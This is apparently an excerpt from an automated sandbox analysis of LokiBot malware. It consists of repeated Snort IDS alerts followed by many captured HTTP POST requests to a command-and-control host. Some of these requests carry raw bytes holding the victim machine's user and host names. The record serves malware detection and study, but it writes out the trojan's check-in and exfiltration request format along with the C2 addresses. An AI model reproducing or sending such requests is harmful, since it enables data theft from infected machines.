                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49806
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49807
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49809
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49810
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49812
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49814
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49815
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49817
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: Joe Sandbox View ASN Name: ASBAXETRU ASBAXETRU
                    Source: global traffic HTTP traffic detected: POST /candy/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: nevomw.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1D39DE6 Content-Length: 196 Connection: close
                    Source: global traffic HTTP traffic detected: POST /candy/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: nevomw.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1D39DE6 Content-Length: 169 Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global traffic
                    HTTP traffic detected: POST /candy/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: nevomw.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: F1D39DE6
                        Content-Length: 169
                        Connection: close
                        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00
                        Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37 00 37 00 31 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 38 00 46 00 39 00 43 00 34 00 45 00 39 00 43 00 37 00 39 00 41 00 33 00 42 00 35 00 32 00 42 00 33 00 46 00 37 00 33 00 39 00 34 00 33 00 30 00 Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
